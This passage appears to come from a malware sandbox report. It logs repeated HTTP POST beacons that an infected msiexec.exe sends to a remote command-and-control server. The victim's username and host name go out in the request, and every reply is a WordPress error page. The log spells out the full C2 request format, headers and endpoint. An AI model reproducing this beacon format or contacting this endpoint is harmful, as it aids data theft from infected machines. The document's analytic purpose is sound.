                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:19:44.444272041 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                        Oct 2, 2024 07:19:44.444283009 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                        Oct 2, 2024 07:19:44.445385933 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        12192.168.2.459096137.184.191.215808076C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 2, 2024 07:19:44.598640919 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:19:44.604525089 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:19:47.324307919 CEST1236INHTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:45 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:19:47.324704885 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                        Oct 2, 2024 07:19:47.324717045 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        13192.168.2.459097137.184.191.215808076C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 2, 2024 07:19:47.479007959 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:19:47.483918905 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:19:49.998955965 CEST1236INHTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:47 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:19:49.999345064 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                        Oct 2, 2024 07:19:49.999356985 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        14192.168.2.459098137.184.191.215808076C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 2, 2024 07:19:50.173902035 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:19:50.178821087 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:19:53.439418077 CEST1236INHTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:50 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:19:53.439882994 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                        Oct 2, 2024 07:19:53.439892054 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                        Oct 2, 2024 07:19:53.441008091 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>
                                        Oct 2, 2024 07:19:53.441025972 CEST1236INHTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:50 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        15192.168.2.459099137.184.191.215808076C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 2, 2024 07:19:53.589097977 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:19:53.593930006 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:19:56.225506067 CEST1236INHTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:54 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:19:56.225925922 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                        Oct 2, 2024 07:19:56.225935936 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                        Oct 2, 2024 07:19:56.227020979 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        16192.168.2.459100137.184.191.215808076C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 2, 2024 07:19:56.374245882 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:19:56.379219055 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:19:59.054563999 CEST1236INHTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:56 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
